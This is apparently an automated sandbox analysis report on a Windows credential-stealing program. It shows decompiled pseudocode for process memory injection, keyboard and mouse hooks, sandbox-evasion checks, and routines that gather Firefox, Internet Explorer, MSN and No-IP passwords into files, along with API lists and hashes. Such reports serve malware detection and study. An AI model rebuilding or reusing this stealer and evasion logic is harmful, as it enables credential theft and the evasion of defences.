				_push( *[fs:eax]);
				 *[fs:eax] = _t26 + 0xfffffebc;
				_t13 = FindFirstFileA(E00401F48(_v8),  &_v328); // executed
				if(_t13 != 0xffffffff) {
					FindClose(_t13); // executed
				}
				_pop(_t23);
				 *[fs:eax] = _t23;
				_push(E00405D68);
				return E00401AC0( &_v8);
			}








                                    0x00405d0e
                                    0x00405d14
                                    0x00405d1b
                                    0x00405d1c
                                    0x00405d21
                                    0x00405d24
                                    0x00405d39
                                    0x00405d41
                                    0x00405d44
                                    0x00405d49
                                    0x00405d4d
                                    0x00405d50
                                    0x00405d53
                                    0x00405d60

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D39
                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,00405D61,?,?,?,00405A56,00000000,00405AC7), ref: 00405D44
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: dcdab070d271b41a397ac8b5c721f9a764d64cac29a79a814ec76c1e737da3ad
                                    • Instruction ID: ef45179a0415a0f0738613dd19991e6189ea7b224224af70f6e9243e4b919f09
                                    • Opcode Fuzzy Hash: dcdab070d271b41a397ac8b5c721f9a764d64cac29a79a814ec76c1e737da3ad
                                    • Instruction Fuzzy Hash: CAF08270604604AFCB11EBB9CD5698F77ECDB453147A049BBF404F22E1E73C9E009A18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040387C, Relevance: 3.0, APIs: 2, Instructions: 28memoryinjectionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 84%
                                    			E0040387C(void* __eax, long __ecx, void* __edx) {
				void* _t2;
				void* _t5;
				void* _t9;
				long _t10;
				void* _t11;
				SIZE_T* _t12;

				_push(__ecx);
				_t10 = __ecx;
				_t11 = __edx;
				_t5 = __eax;
				_t2 = VirtualAllocEx(__eax, 0, __ecx, 0x3000, 0x40); // executed
				_t9 = _t2;
				WriteProcessMemory(_t5, _t9, _t11, _t10, _t12); // executed
				return _t9;
			}









                                    0x00403880
                                    0x00403881
                                    0x00403883
                                    0x00403885
                                    0x00403892
                                    0x00403897
                                    0x0040389e
                                    0x004038aa

                                    APIs
                                    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 00403892
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,00003000,00000040,?,?,?,?,?,004038C9), ref: 0040389E
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AllocMemoryProcessVirtualWrite
                                    • String ID:
                                    • API String ID: 645232735-0
                                    • Opcode ID: 44b08b0c31ed70faa86a56c95f5dcbe8ec638da3a1b73dcacbf25ce5a432df3e
                                    • Instruction ID: be37be616b4aec00b4a8009f52dfb0ce1374bdb392ffd0e09f2bb002aa04c1fa
                                    • Opcode Fuzzy Hash: 44b08b0c31ed70faa86a56c95f5dcbe8ec638da3a1b73dcacbf25ce5a432df3e
                                    • Instruction Fuzzy Hash: 9FD05EA234621437E134216B6C46FB71E4CCBC7BF6E11053AB708E628294A69C0141F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040BBF4, Relevance: 73.8, APIs: 30, Strings: 12, Instructions: 333sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 84%
                                    			E0040BBF4(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				void* _t49;
				void* _t52;
				long _t53;
				void* _t55;
				intOrPtr* _t65;
				void* _t68;
				long _t69;
				char* _t80;
				intOrPtr* _t93;
				long _t97;
				intOrPtr* _t100;
				long _t104;
				intOrPtr* _t107;
				long _t111;
				struct HINSTANCE__* _t114;
				struct HINSTANCE__* _t117;
				void* _t120;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t216;
				void* _t217;
				void* _t218;
				void* _t219;
				void* _t220;
				void* _t221;
				void* _t222;
				intOrPtr _t229;
				void* _t254;
				void* _t255;
				intOrPtr _t257;
				intOrPtr _t258;
				void* _t270;

				_t255 = __esi;
				_t254 = __edi;
				_t257 = _t258;
				_t213 = 0xb;
				do {
					_push(0);
					_push(0);
					_t213 = _t213 - 1;
				} while (_t213 != 0);
				E00403418(0x40bb04);
				_push(_t257);
				_push(0x40c0c4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t258;
				_t49 = E00403568(0, 0, "_x_X_UPDATE_X_x_"); // executed
				_t209 = _t49;
				if(GetLastError() != 0xb7) {
					CloseHandle(_t209); // executed
				} else {
					CloseHandle(_t209);
					Sleep(0x2ee0);
				}
				_t52 = E00403568(0, 0, "_x_X_PASSWORDLIST_X_x_"); // executed
				_t210 = _t52;
				_t53 = GetLastError();
				_t261 = _t53 - 0xb7;
				if(_t53 != 0xb7) {
					CloseHandle(_t210);
					_t55 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_"); // executed
					_t211 = _t55;
					__eflags = GetLastError() - 0xb7;
					if(__eflags != 0) {
						CloseHandle(_t211);
						L26:
						E004013A4(1,  &_v80);
						_t225 = "Restart";
						E00401E94(_v80, "Restart");
						if(__eflags != 0) {
							Sleep(0x3e8); // executed
						}
						E00404604(_t213, __eflags);
						E0040491C();
						E0040B118(_t225, _t254, _t255);
						_t65 =  *0x40d204; // 0x40e8f8
						_t68 = E00403568(0, 0, E00401F48( *_t65)); // executed
						_t212 = _t68;
						_t69 = GetLastError();
						__eflags = _t69 - 0xb7;
						if(_t69 != 0xb7) {
							CloseHandle(_t212); // executed
						} else {
							CloseHandle(_t212);
							Sleep(0x3e8);
							_t93 =  *0x40d204; // 0x40e8f8
							_t212 = E00403568(0, 0, E00401F48( *_t93));
							_t97 = GetLastError();
							__eflags = _t97 - 0xb7;
							if(_t97 != 0xb7) {
								CloseHandle(_t212);
							} else {
								CloseHandle(_t212);
								Sleep(0x3e8);
								_t100 =  *0x40d204; // 0x40e8f8
								_t212 = E00403568(0, 0, E00401F48( *_t100));
								_t104 = GetLastError();
								__eflags = _t104 - 0xb7;
								if(_t104 != 0xb7) {
									CloseHandle(_t212);
								} else {
									CloseHandle(_t212);
									Sleep(0x3e8);
									_t107 =  *0x40d204; // 0x40e8f8
									_t212 = E00403568(0, 0, E00401F48( *_t107));
									_t111 = GetLastError();
									__eflags = _t111 - 0xb7;
									if(_t111 != 0xb7) {
										CloseHandle(_t212);
									} else {
										ExitProcess(0);
									}
								}
							}
						}
						__eflags =  *((char*)( *0x40d1dc)) - 1;
						if( *((char*)( *0x40d1dc)) != 1) {
							__eflags = 0;
							E004013A4(0, 0x40f1e8);
						} else {
							E004013A4(0,  &_v88);
							E00406B54(_v88, _t212,  &_v84, _t254, _t255); // executed
							E00401B14(0x40f1e8, _v84);
						}
						E00406008( &_v92);
						E00401D58( &_v92, "XX--XX--XX.txt");
						E0040B93C( *0x40f1e8, _t212, _v92, _t254, _t255, __eflags);
						_t80 =  *0x40d214; // 0x40e8f4
						__eflags =  *_t80 - 1;
						if(__eflags == 0) {
							E0040B7FC(_t212, _t254, _t255, __eflags);
							Sleep(0x3e8); // executed
						}
						E0040B3C0(_t212, _t213, _t254, _t255); // executed
						L43:
						_pop(_t229);
						 *[fs:eax] = _t229;
						_push(0x40c0cb);
						return E00401AE4( &_v92, 0x12);
					}
					CloseHandle(_t211);
					_t114 =  *0x40e670; // 0x400000
					SetWindowsHookExA(0xd, E0040B0B8, _t114, 0);
					_t117 =  *0x40e670; // 0x400000
					SetWindowsHookExA(0xe, E0040B108, _t117, 0);
					while(1) {
						_t120 = E0040BA84(__eflags);
						__eflags = _t120;
						if(_t120 != 0) {
							break;
						}
						E00405918();
					}
					ExitProcess(0);
					goto L26;
				}
				CloseHandle(_t210);
				E00409AD4( &_v24, _t210, _t255, _t261);
				E00401B14(0x40f1ec, _v24);
				_t262 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v28);
					E00401D58( &_v28, "NOIP.abc");
					_pop(_t222);
					E00405D70(_v28, _t210, _t222,  *0x40f1ec, _t255, _t262);
				}
				E00409D28( &_v32, _t210, _t254, _t255);
				_t235 = _v32;
				E00401B14(0x40f1ec, _v32);
				_t263 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v36);
					E00401D58( &_v36, "MSN.abc");
					_t235 =  *0x40f1ec;
					_pop(_t221);
					E00405D70(_v36, _t210, _t221,  *0x40f1ec, _t255, _t263);
				}
				E00409EF8( &_v40, _t210, _t235, _t254, _t255);
				E00401B14(0x40f1ec, _v40);
				_t264 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v44);
					E00401D58( &_v44, "FIREFOX.abc");
					_pop(_t220);
					E00405D70(_v44, _t210, _t220,  *0x40f1ec, _t255, _t264);
				}
				E00409A84( &_v48);
				E00401B14(0x40f1ec, _v48);
				_t265 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v52);
					E00401D58( &_v52, "IELOGIN.abc");
					_pop(_t219);
					E00405D70(_v52, _t210, _t219,  *0x40f1ec, _t255, _t265);
				}
				E00409A90( &_v56);
				E00401B14(0x40f1ec, _v56);
				_t266 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v60);
					E00401D58( &_v60, "IEPASS.abc");
					_pop(_t218);
					E00405D70(_v60, _t210, _t218,  *0x40f1ec, _t255, _t266);
				}
				E00409A9C( &_v64, _t254, _t255, _t266, _t270);
				E00401B14(0x40f1ec, _v64);
				_t267 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v68);
					E00401D58( &_v68, "IEAUTO.abc");
					_pop(_t217);
					E00405D70(_v68, _t210, _t217,  *0x40f1ec, _t255, _t267);
				}
				E00409AB8( &_v72, _t254, _t255, _t267);
				E00401B14(0x40f1ec, _v72);
				_t268 =  *0x40f1ec;
				if( *0x40f1ec != 0) {
					_push(E00401D50( *0x40f1ec));
					E00406008( &_v76);
					E00401D58( &_v76, "IEWEB.abc");
					_pop(_t216);
					E00405D70(_v76, _t210, _t216,  *0x40f1ec, _t255, _t268);
				}
				goto L43;
			}
























































                                    0x0040bbf4
                                    0x0040bbf4
                                    0x0040bbf5
                                    0x0040bbf7
                                    0x0040bbfc
                                    0x0040bbfc
                                    0x0040bbfe
                                    0x0040bc00
                                    0x0040bc00
                                    0x0040bc09
                                    0x0040bc10
                                    0x0040bc11
                                    0x0040bc16
                                    0x0040bc19
                                    0x0040bc25
                                    0x0040bc2a
                                    0x0040bc36
                                    0x0040bc4b
                                    0x0040bc38
                                    0x0040bc39
                                    0x0040bc43
                                    0x0040bc43
                                    0x0040bc59
                                    0x0040bc5e
                                    0x0040bc60
                                    0x0040bc65
                                    0x0040bc6a
                                    0x0040be9b
                                    0x0040bea9
                                    0x0040beae
                                    0x0040beb5
                                    0x0040beba
                                    0x0040bf06
                                    0x0040bf0b
                                    0x0040bf13
                                    0x0040bf1b
                                    0x0040bf20
                                    0x0040bf25
                                    0x0040bf2c
                                    0x0040bf2c
                                    0x0040bf31
                                    0x0040bf36
                                    0x0040bf3b
                                    0x0040bf40
                                    0x0040bf51
                                    0x0040bf56
                                    0x0040bf58
                                    0x0040bf5d
                                    0x0040bf62
                                    0x0040c02a
                                    0x0040bf68
                                    0x0040bf69
                                    0x0040bf73
                                    0x0040bf78
                                    0x0040bf8e
                                    0x0040bf90
                                    0x0040bf95
                                    0x0040bf9a
                                    0x0040c022
                                    0x0040bfa0
                                    0x0040bfa1
                                    0x0040bfab
                                    0x0040bfb0
                                    0x0040bfc6
                                    0x0040bfc8
                                    0x0040bfcd
                                    0x0040bfd2
                                    0x0040c01a
                                    0x0040bfd4
                                    0x0040bfd5
                                    0x0040bfdf
                                    0x0040bfe4
                                    0x0040bffa
                                    0x0040bffc
                                    0x0040c001
                                    0x0040c006
                                    0x0040c012
                                    0x0040c008
                                    0x0040c00a
                                    0x0040c00a
                                    0x0040c006
                                    0x0040bfd2
                                    0x0040bf9a
                                    0x0040c034
                                    0x0040c037
                                    0x0040c062
                                    0x0040c064
                                    0x0040c039
                                    0x0040c03e
                                    0x0040c049
                                    0x0040c056
                                    0x0040c056
                                    0x0040c06c
                                    0x0040c079
                                    0x0040c086
                                    0x0040c08b
                                    0x0040c090
                                    0x0040c093
                                    0x0040c095
                                    0x0040c09f
                                    0x0040c09f
                                    0x0040c0a4
                                    0x0040c0a9
                                    0x0040c0ab
                                    0x0040c0ae
                                    0x0040c0b1
                                    0x0040c0c3
                                    0x0040c0c3
                                    0x0040bebd
                                    0x0040bec4
                                    0x0040bed2
                                    0x0040bed9
                                    0x0040bee7
                                    0x0040bef3
                                    0x0040bef3
                                    0x0040bef8
                                    0x0040befa
                                    0x00000000
                                    0x00000000
                                    0x0040beee
                                    0x0040beee
                                    0x0040befe
                                    0x00000000
                                    0x0040befe
                                    0x0040bc71
                                    0x0040bc79
                                    0x0040bc86
                                    0x0040bc8b
                                    0x0040bc92
                                    0x0040bc9e
                                    0x0040bca2
                                    0x0040bcaf
                                    0x0040bcbd
                                    0x0040bcbe
                                    0x0040bcbe
                                    0x0040bcc6
                                    0x0040bccb
                                    0x0040bcd3
                                    0x0040bcd8
                                    0x0040bcdf
                                    0x0040bceb
                                    0x0040bcef
                                    0x0040bcfc
                                    0x0040bd04
                                    0x0040bd0a
                                    0x0040bd0b
                                    0x0040bd0b
                                    0x0040bd13
                                    0x0040bd20
                                    0x0040bd25
                                    0x0040bd2c
                                    0x0040bd38
                                    0x0040bd3c
                                    0x0040bd49
                                    0x0040bd57
                                    0x0040bd58
                                    0x0040bd58
                                    0x0040bd60
                                    0x0040bd6d
                                    0x0040bd72
                                    0x0040bd79
                                    0x0040bd85
                                    0x0040bd89
                                    0x0040bd96
                                    0x0040bda4
                                    0x0040bda5
                                    0x0040bda5
                                    0x0040bdad
                                    0x0040bdba
                                    0x0040bdbf
                                    0x0040bdc6
                                    0x0040bdd2
                                    0x0040bdd6
                                    0x0040bde3
                                    0x0040bdf1
                                    0x0040bdf2
                                    0x0040bdf2
                                    0x0040bdfa
                                    0x0040be07
                                    0x0040be0c
                                    0x0040be13
                                    0x0040be1f
                                    0x0040be23
                                    0x0040be30
                                    0x0040be3e
                                    0x0040be3f
                                    0x0040be3f
                                    0x0040be47
                                    0x0040be54
                                    0x0040be59
                                    0x0040be60
                                    0x0040be70
                                    0x0040be74
                                    0x0040be81
                                    0x0040be8f
                                    0x0040be90
                                    0x0040be90
                                    0x00000000

                                    APIs
                                    • GetLastError.KERNEL32(00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC2C
                                    • CloseHandle.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC39
                                    • Sleep.KERNEL32(00002EE0,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC43
                                    • CloseHandle.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC4B
                                      • Part of subcall function 00405D70: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DB6
                                      • Part of subcall function 00405D70: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DCE
                                      • Part of subcall function 00405D70: WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DE4
                                      • Part of subcall function 00405D70: CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DEA
                                    • GetLastError.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC60
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC71
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BE9B
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEB0
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEBD
                                    • SetWindowsHookExA.USER32(0000000D,Function_0000B0B8,00400000,00000000), ref: 0040BED2
                                    • SetWindowsHookExA.USER32(0000000E,Function_0000B108,00400000,00000000), ref: 0040BEE7
                                      • Part of subcall function 0040BA84: GetLastError.KERNEL32(00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BA95
                                      • Part of subcall function 0040BA84: CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAA2
                                    • ExitProcess.KERNEL32(00000000,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEFE
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF06
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF2C
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF58
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF69
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF73
                                    • GetLastError.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF90
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFA1
                                    • Sleep.KERNEL32(000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFAB
                                    • GetLastError.KERNEL32(000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFC8
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFD5
                                    • Sleep.KERNEL32(000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFDF
                                    • GetLastError.KERNEL32(000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFFC
                                    • ExitProcess.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C00A
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C012
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C01A
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C09F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000009.00000002.554444506.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554509749.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.554595376.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555075872.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000009.00000002.555106907.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$ErrorLast$Sleep$File$CreateExitHookProcessWindows$MutexPointerWrite
                                    • String ID: FIREFOX.abc$IEAUTO.abc$IELOGIN.abc$IEPASS.abc$IEWEB.abc$MSN.abc$NOIP.abc$Restart$XX--XX--XX.txt$_x_X_BLOCKMOUSE_X_x_$_x_X_PASSWORDLIST_X_x_$_x_X_UPDATE_X_x_
                                    • API String ID: 3001352634-1131808598
                                    • Opcode ID: 62af1ef2336ec2e1ff34df4ac233d62ff794d0106d834388617ccd72b51add9f
                                    • Instruction ID: bdf70af56670c6b0a4a77e5acd908e49726916f33cb45a25643fdd496cb3d72a
                                    • Opcode Fuzzy Hash: 62af1ef2336ec2e1ff34df4ac233d62ff794d0106d834388617ccd72b51add9f
                                    • Instruction Fuzzy Hash: 36C10130640244EADB10FBA6DC82B9D77689F45309F50453BF501BB2E2DB7CAE45CAAD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B118, Relevance: 72.0, APIs: 29, Strings: 12, Instructions: 207COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 88%
                                    			E0040B118(void* __edx, void* __edi, void* __esi) {
				void* __ebx;
				char* _t1;
				char* _t2;
				char* _t3;
				char* _t4;
				char* _t5;
				char* _t6;
				char* _t7;
				char* _t8;
				char* _t9;
				char* _t10;
				char* _t11;
				char* _t12;
				char* _t13;
				long _t15;
				void* _t49;
				long _t58;
				void* _t62;
				void* _t63;
				intOrPtr* _t64;

				_t63 = __esi;
				_t62 = __edi;
				_t1 =  *0x40d1d4; // 0x40e8e0
				if( *_t1 == 1 && E004052EC() == 1) {
					ExitProcess(0);
				}
				_t2 =  *0x40d1b0; // 0x40e8e1
				if( *_t2 == 1 && L00405168(_t58, _t63) == 1) {
					ExitProcess(0);
				}
				_t3 =  *0x40d1fc; // 0x40e8e2
				if( *_t3 == 1 && E00405124() == 1) {
					ExitProcess(0);
				}
				_t4 =  *0x40d1ac; // 0x40e8e3
				_t71 =  *_t4 - 1;
				if( *_t4 == 1 && E004051CC(_t58, _t62, _t63, _t71) == 1) {
					ExitProcess(0);
				}
				_t5 =  *0x40d1f4; // 0x40e8e4
				if( *_t5 == 1 && E00405310() == 1) {
					ExitProcess(0);
				}
				_t6 =  *0x40d1c8; // 0x40e8e5
				if( *_t6 == 1 && E004054A4() == 1) {
					ExitProcess(0);
				}
				_t7 =  *0x40d1d0; // 0x40e8e6
				if( *_t7 == 1 && E004053EC() == 1) {
					ExitProcess(0);
				}
				_t8 =  *0x40d1c0; // 0x40e8e7
				if( *_t8 == 1 && E00405334() == 1) {
					ExitProcess(0);
				}
				_t9 =  *0x40d1f8; // 0x40e8e8
				_t81 =  *_t9 - 1;
				if( *_t9 == 1) {
					_t49 = E0040555C(_t58, _t62, _t63, _t81); // executed
					if(_t49 == 1) {
						ExitProcess(0);
					}
				}
				_t10 =  *0x40d1bc; // 0x40e8e9
				if( *_t10 == 1 && E0040588C() == 1) {
					ExitProcess(0);
				}
				_t11 =  *0x40d1b4; // 0x40e8ea
				if( *_t11 == 1 && E004056C0() == 1) {
					ExitProcess(0);
				}
				_t12 =  *0x40d200; // 0x40e8eb
				if( *_t12 == 1) {
					_t58 = GetTickCount();
					if(E00405750(L00405168) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004051CC) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004052EC) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E00405310) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E00405334) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004053EC) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004054A4) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E0040555C) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004056DC) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E00405770) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004057B4) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E0040588C) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E004056C0) != 0) {
						ExitProcess(0);
					}
					if(E00405750(E00405124) != 0) {
						ExitProcess(0);
					}
					if(E004056DC(_t58) == 1) {
						ExitProcess(0);
					}
				}
				_t13 =  *0x40d200; // 0x40e8eb
				if( *_t13 != 1) {
					L70:
					return _t13;
				} else {
					E00405770();
					_t15 = GetTickCount();
					_push(0);
					asm("cdq");
					 *_t64 =  *_t64 - _t58;
					asm("sbb [esp+0x4], edx");
					_t13 = _t15;
					if(0 != 0) {
						if(0 <= 0) {
							goto L70;
						}
						L69:
						ExitProcess(0);
						return _t13;
					}
					if(_t13 <= 0x1388) {
						goto L70;
					}
					goto L69;
				}
			}























                                    0x0040b118
                                    0x0040b118
                                    0x0040b119
                                    0x0040b121
                                    0x0040b12e
                                    0x0040b12e
                                    0x0040b133
                                    0x0040b13b
                                    0x0040b148
                                    0x0040b148
                                    0x0040b14d
                                    0x0040b155
                                    0x0040b162
                                    0x0040b162
                                    0x0040b167
                                    0x0040b16c
                                    0x0040b16f
                                    0x0040b17c
                                    0x0040b17c
                                    0x0040b181
                                    0x0040b189
                                    0x0040b196
                                    0x0040b196
                                    0x0040b19b
                                    0x0040b1a3
                                    0x0040b1b0
                                    0x0040b1b0
                                    0x0040b1b5
                                    0x0040b1bd
                                    0x0040b1ca
                                    0x0040b1ca
                                    0x0040b1cf
                                    0x0040b1d7
                                    0x0040b1e4
                                    0x0040b1e4
                                    0x0040b1e9
                                    0x0040b1ee
                                    0x0040b1f1
                                    0x0040b1f3
                                    0x0040b1fa
                                    0x0040b1fe
                                    0x0040b1fe
                                    0x0040b1fa
                                    0x0040b203
                                    0x0040b20b
                                    0x0040b218
                                    0x0040b218
                                    0x0040b21d
                                    0x0040b225
                                    0x0040b232
                                    0x0040b232
                                    0x0040b237
                                    0x0040b23f
                                    0x0040b24a
                                    0x0040b258
                                    0x0040b25c
                                    0x0040b25c
                                    0x0040b26d
                                    0x0040b271
                                    0x0040b271
                                    0x0040b282
                                    0x0040b286
                                    0x0040b286
                                    0x0040b297
                                    0x0040b29b
                                    0x0040b29b
                                    0x0040b2ac
                                    0x0040b2b0
                                    0x0040b2b0
                                    0x0040b2c1
                                    0x0040b2c5
                                    0x0040b2c5
                                    0x0040b2d6
                                    0x0040b2da
                                    0x0040b2da
                                    0x0040b2eb
                                    0x0040b2ef
                                    0x0040b2ef
                                    0x0040b300
                                    0x0040b304
                                    0x0040b304
                                    0x0040b315
                                    0x0040b319
                                    0x0040b319
                                    0x0040b32a
                                    0x0040b32e
                                    0x0040b32e
                                    0x0040b33f
                                    0x0040b343
                                    0x0040b343
                                    0x0040b354
                                    0x0040b358
                                    0x0040b358
                                    0x0040b369
                                    0x0040b36d
                                    0x0040b36d
                                    0x0040b379
                                    0x0040b37d
                                    0x0040b37d
                                    0x0040b379
                                    0x0040b382
                                    0x0040b38a
                                    0x0040b3be
                                    0x0040b3be
                                    0x0040b38c
                                    0x0040b38c
                                    0x0040b391
                                    0x0040b398
                                    0x0040b39c
                                    0x0040b39d
                                    0x0040b3a0
                                    0x0040b3a4
                                    0x0040b3a9
                                    0x0040b3b4
                                    0x00000000
                                    0x00000000
                                    0x0040b3b6
                                    0x0040b3b8
                                    0x00000000
                                    0x0040b3b8
                                    0x0040b3b0
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040b3b2

                                    APIs
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B12E
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B148
